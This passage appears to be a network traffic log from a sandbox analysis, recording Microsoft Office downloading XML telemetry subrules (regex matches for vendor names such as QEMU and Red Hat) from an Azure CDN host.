                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      70192.168.2.64978413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 264b3f43-b01e-0002-5a1b-3b1b8f000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095424Z-r1d97b99577n4dznhC1TEBc1qw00000008sg00000000513m
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      71192.168.2.64978813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 432
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 41283c59-801e-0015-058c-3af97f000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95cf7qddhC1NYC66an0000000a70000000000xex
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      72192.168.2.64978713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bfe6dbcf-201e-006e-678c-3abbe3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-r1d97b99577mrt4rhC1TEBftkc00000008p00000000031vc
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      73192.168.2.64979013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-r1d97b99577lxltfhC1TEByw2s00000008q000000000b4v8
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      74192.168.2.64978913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 9cb1ed33-701e-0021-398c-3a3d45000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95cjbkr4hC1NYCeu240000000a0g000000000n4p
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      75192.168.2.64979113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 4f8e9926-c01e-00ad-7c8c-3aa2b9000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95crl6swhC1NYC3ueg0000000a5g00000000bpwn
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      76192.168.2.64979513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95cjbkr4hC1NYCeu2400000009tg00000000ghap
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      77192.168.2.64979613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                      x-ms-request-id: cb785bac-301e-0000-6c8c-3aeecc000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-r1d97b99577ckpmjhC1TEBrzs000000008t00000000049dc
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      78192.168.2.64979713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 405
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
